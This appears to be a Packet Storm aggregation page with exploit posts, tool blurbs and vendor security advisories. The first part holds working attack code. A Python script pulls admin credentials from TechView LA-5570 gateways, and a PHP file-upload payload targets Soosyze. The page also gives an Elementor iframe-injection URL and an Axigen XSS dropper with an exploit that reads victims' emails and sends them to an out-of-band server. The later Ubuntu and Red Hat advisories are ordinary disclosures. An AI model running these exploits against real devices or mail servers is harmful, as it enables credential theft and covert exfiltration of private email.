TECHView LA5570 Wireless Gateway version 1.0.19_T53 suffers from directory traversal, privilege escalation, and information disclosure vulnerabilities.

    # Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities# Google Dork: N/A# Date: 25/08/2023# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570# Software Link: N/A# Version: 1.0.19_T53# Tested on: MACOS/Linux# CVE : CVE-2023-34723# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725#!/opt/homebrew/bin/python3import requestsimport sysfrom time import sleepfrom urllib3.exceptions import InsecureRequestWarningfrom colorama import initfrom colorama import Fore, Back, Styleimport reimport osimport ipaddressrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)def banner():    if os.name == 'posix':        clr_cmd = ('clear')    elif os.name == 'nt':        clr_cmd = ('cls')    os.system(clr_cmd)    print ("[+]****************************************************[+]")    print (" | Author      : The Security Team                      |")    print (" | Company     : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")    print (" | Description : TechVIEW LA-5570 Directory Traversal   |")    print (" | Usage       : "+sys.argv[0]+" <target>              |")       print ("[+]****************************************************[+]")def usage():    print (f"Usage: {sys.argv[0]} <target>")def main(target):    domain = "http://"+target+"/config/system.conf"    try:        url = domain.strip()        r = requests.get(url, verify=False, timeout=3)        print ("[+] Retrieving credentials", flush=True, end='')        sleep(1)        print(" .", flush=True, end='')        sleep(1)        print(" .", flush=True, end='')        sleep(1)        print(" .", flush=True, end='')        if ("system_password" in r.text):            data =  (r.text.split("\n"))            print (f"\n{data[1]}")        else:            print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)    except TimeoutError:        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)    except KeyboardInterrupt:        return    except requests.exceptions.Timeout:        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)        return        if __name__ == '__main__':    if len(sys.argv)>1:        banner()        target = sys.argv[1]        try:            validate = ipaddress.ip_address(target)            if (validate):                main (target)        except ValueError as e:            print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)     else:        print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)

TECHView LA5570 Wireless Gateway 1.0.19_T53 Traversal / Privilege Escalation

Soosyze version 2.0.0 suffers from an arbitrary file upload vulnerability.

    ## Title: soosyze 2.0.0 - File Upload## Author: nu11secur1ty## Date: 04.26.2023-08.28.2023## Vendor: https://soosyze.com/## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0## Reference: https://portswigger.net/web-security/file-upload## Description:Broken file upload logic. The malicious user can upload whatever hewants to an HTML file and when he tries to execute it he views almostallfile paths. This could be worse than ever, it depends on the scenario.STATUS: HIGH Vulnerability[+]Exploit:```HTML<!DOCTYPE html><html><head><title>Hello broken file upload logic, now I can read your specialdirectory pats, thank you ;)</title></head><body><h1>  <?php    phpinfo();  ?>  </h1></body></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)## Time spend:01:27:00

Soosyze 2.0.0 Arbitrary File Upload

Axigen versions 10.5.0–4370c946 and below suffer from a cross site scripting vulnerability.

    # Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS# Google Dork: inurl:passwordexpired=yes# Date: 2023-08-21# Exploit Author: AmirZargham# Vendor Homepage: https://www.axigen.com/# Software Link: https://www.axigen.com/mail-server/download/# Version: (10.5.0–4370c946) and older version of Axigen WebMail# Tested on: firefox,chrome# CVE: CVE-2022-31470ExploitWe use the second Reflected XSS to exploit this vulnerability, create amalicious link, and steal user emails.Dropper codeThis dropper code, loads and executes JavaScript exploit code from a remoteserver.');x = document.createElement('script');x.src = 'https://example.com/exploit.js';window.addEventListener('DOMContentLoaded',function y(){  document.body.appendChild(x)})//Encoded form/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//Exploit codexhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = newXMLHttpRequest();oob_server = 'https://example.com/';var script_tag = document.createElement('script');xhr1.open('GET', '/', true);xhr1.onreadystatechange = () => {    if (xhr1.readyState === XMLHttpRequest.DONE) {        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,true);        xhr2.setRequestHeader('Content-Type', 'application/json');        xhr2.onreadystatechange = () => {            if (xhr2.readyState === XMLHttpRequest.DONE) {                if (xhr2.status === 401){                    script_tag.src =`${oob_server}?status=session_expired&domain=${document.domain}`;                    document.body.appendChild(script_tag);                } else {                    resp = xhr2.responseText;                    folderId = JSON.parse(resp)["mails"][0]["folderId"];                    xhr3.open('GET',`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);                    xhr3.onreadystatechange = () => {                        if (xhr3.readyState === XMLHttpRequest.DONE) {                            emails = xhr3.responseText;                            script_tag.src =`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;                            document.body.appendChild(script_tag);                        }                    };                    xhr3.send();                }            }        };        var body = JSON.stringify({isUnread: false});        xhr2.send(body);    }};xhr1.send();Combining dropper and exploitYou can host the exploit code somewhere and then address it in the droppercode.

Axigen 10.5.0–4370c946 Cross Site Scripting

WordPress Elementor plugin versions prior to 3.5.5 suffer from an iframe injection vulnerability.

    # Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection# Date: 28.08.2023# Exploit Author: Miguel Santareno# Vendor Homepage: https://elementor.com/# Version: < 3.5.5# Tested on: Google and Firefox latest version# CVE : CVE-2022-4953# 1. DescriptionThe plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.# 2. Proof of Concept (PoC)Proof of Concept:https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

WordPress Elementor Iframe Injection

tc is a low-tech free software to chat anonymously and ciphered over Tor circuits in PGP. Use it to protected your communication end-to-end with RSA/DSA encryption and keep yourself anonymously reachable by anyone who only knows your .onion address and your public key. All this and more in 2400 lines of C code that compile and run on BSD and Linux systems with an IRC like GUI.

tc Tor Chat Client

Ubuntu Security Notice 6353-1 - Wooseok Kang discovered that PLIB did not properly manage memory under certain circumstances. If a user were tricked into opening a specially crafted TGA file, an attacker could possibly use this issue to cause applications using PLIB to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6353-1September 07, 2023plib vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:PLIB could be made to execute arbitrary code if it opens a speciallycrafted TGA file.Software Description:- plib: Portability Libraries: Development packageDetails:Wooseok Kang discovered that PLIB did not properly manage memory undercertain circumstances. If a user were tricked into opening a speciallycrafted TGA file, an attacker could possibly use this issue to causeapplications using PLIB to crash, resulting in a denial of service, orpossibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   libplib1                        1.8.5-8ubuntu0.20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):   libplib1                        1.8.5-8ubuntu0.18.04.1~esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):   libplib1                        1.8.5-7ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6353-1   CVE-2021-38714Package Information:   https://launchpad.net/ubuntu/+source/plib/1.8.5-8ubuntu0.20.04.1

Ubuntu Security Notice USN-6353-1

Ubuntu Security Notice 6352-1 - It was discovered that Apache Shiro incorrectly handled certain HTTP requests. A remote attacker could possibly use this issue to bypass security restrictions.

    ==========================================================================Ubuntu Security Notice USN-6352-1September 07, 2023shiro vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Apache Shiro.Software Description:- shiro: Powerful and easy-to-use Java security frameworkDetails:It was discovered that Apache Shiro incorrectly handled certain HTTPrequests. A remote attacker could possibly use this issue to bypasssecurity restrictions. (CVE-2020-13933, CVE-2020-17510)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   libshiro-java                   1.3.2-4ubuntu0.2Ubuntu 18.04 LTS (Available with Ubuntu Pro):   libshiro-java                   1.3.2-3ubuntu0.18.04.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6352-1   CVE-2020-13933, CVE-2020-17510Package Information:   https://launchpad.net/ubuntu/+source/shiro/1.3.2-4ubuntu0.2

Ubuntu Security Notice USN-6352-1

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 4.6.0

Ubuntu Security Notice 6351-1 - It was discovered that the NTFS file system implementation in the Linux kernel did not properly validate MFT flags in certain situations. An attacker could use this to construct a malicious NTFS image that, when mounted and operated on, could cause a denial of service. Zi Fan Tan discovered that the binder IPC implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6351-1September 06, 2023linux-gke, linux-gkeop vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systemsDetails:It was discovered that the NTFS file system implementation in the Linuxkernel did not properly validate MFT flags in certain situations. Anattacker could use this to construct a malicious NTFS image that, whenmounted and operated on, could cause a denial of service (system crash).(CVE-2022-48425)Zi Fan Tan discovered that the binder IPC implementation in the Linuxkernel contained a use-after-free vulnerability. A local attacker could usethis to cause a denial of service (system crash) or possibly executearbitrary code. (CVE-2023-21255)It was discovered that a race condition existed in the f2fs file system inthe Linux kernel, leading to a null pointer dereference vulnerability. Anattacker could use this to construct a malicious f2fs image that, whenmounted and operated on, could cause a denial of service (system crash).(CVE-2023-2898)It was discovered that the DVB Core driver in the Linux kernel did notproperly handle locking events in certain situations. A local attackercould use this to cause a denial of service (kernel deadlock).(CVE-2023-31084)Yang Lan discovered that the GFS2 file system implementation in the Linuxkernel could attempt to dereference a null pointer in some situations. Anattacker could use this to construct a malicious GFS2 image that, whenmounted and operated on, could cause a denial of service (system crash).(CVE-2023-3212)It was discovered that the KSMBD implementation in the Linux kernel did notproperly validate buffer sizes in certain operations, leading to an out-of-bounds read vulnerability. A remote attacker could use this to cause adenial of service (system crash) or possibly expose sensitive information.(CVE-2023-38426, CVE-2023-38428)It was discovered that the KSMBD implementation in the Linux kernel did notproperly calculate the size of certain buffers. A remote attacker could usethis to cause a denial of service (system crash) or possibly executearbitrary code. (CVE-2023-38429)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1027-gkeop   5.15.0-1027.32   linux-image-5.15.0-1041-gke     5.15.0-1041.46   linux-image-gke                 5.15.0.1041.40   linux-image-gke-5.15            5.15.0.1041.40   linux-image-gkeop               5.15.0.1027.26   linux-image-gkeop-5.15          5.15.0.1027.26After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6351-1   CVE-2022-48425, CVE-2023-21255, CVE-2023-2898, CVE-2023-31084,   CVE-2023-3212, CVE-2023-38426, CVE-2023-38428, CVE-2023-38429Package Information:   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1041.46   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1027.32

Ubuntu Security Notice USN-6351-1

Red Hat Security Advisory 2023-5019-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.15.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:5019-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5019  
Issue date:        2023-09-07  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.15.0 ESR.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

ppc64:  
firefox-102.15.0-1.el7_9.ppc64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.ppc64.rpm

ppc64le:  
firefox-102.15.0-1.el7_9.ppc64le.rpm  
firefox-debuginfo-102.15.0-1.el7_9.ppc64le.rpm

s390x:  
firefox-102.15.0-1.el7_9.s390x.rpm  
firefox-debuginfo-102.15.0-1.el7_9.s390x.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk+ctKAAoJENzjgjWX9erE7AAQAIR+dzCTGF9i9nf0ayNsK3Pe  
Rk4TmAqX4wlOo+bjpYxezU5R8eGn7142w+zN3HZCtnGQGGrNJfJZYa58rSgLftaL  
mFT5gSNslOboKez1PU46DwMlN8umldYr+bzPMJsxLb9+H3Fk3U8WJsG/01onr+4M  
/ebTKrTPwUohKYS+qk3fM/4X/TC4Lt0qjHUR2DQuVKMRrWV+nqKirJ1sysTER8qc  
X7cpuxiPuIy1Ja0Pa/zKwCVbJr5p34aAO2zvVq3Ga757SPIJJO/X+N+SRJihRFKV  
Ac5Js5lbVK8/h9d1abUFMG2055CW2eYo0vesbyeYXoCKlT935X5uItb241rwmQFL  
iGStlIUWrX9pncpAX9ne5KJuYXi7zIUsazfVj1A1m94P8YK0aVnLFHbNLJmrNJga  
x33M0UeagROnjK13pmMI52o6aTF5E8MgUQhsLZC3kk9zW5EMSm1xlN+OuKQhTH7f  
IhatDJg6FBDAEPVAYijNeejdy/kPo8FXBPyoFDVyi5wdGyMyATqIoRG+0/8YsMlG  
MnwYs5C4bz34YOKv0V6jHvqChV/2bHNGSiW9vJEAZ6hA58SneJHwSmach5Cp7eON  
IXeIGOmVFwJMTS30jSXdWUGMPyUxqMAKxs4ayPnEURhOCjRhBvMXqtwpEIG/pz+m  
6lKd728IFmTZmFnZ11sb  
=s3dk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm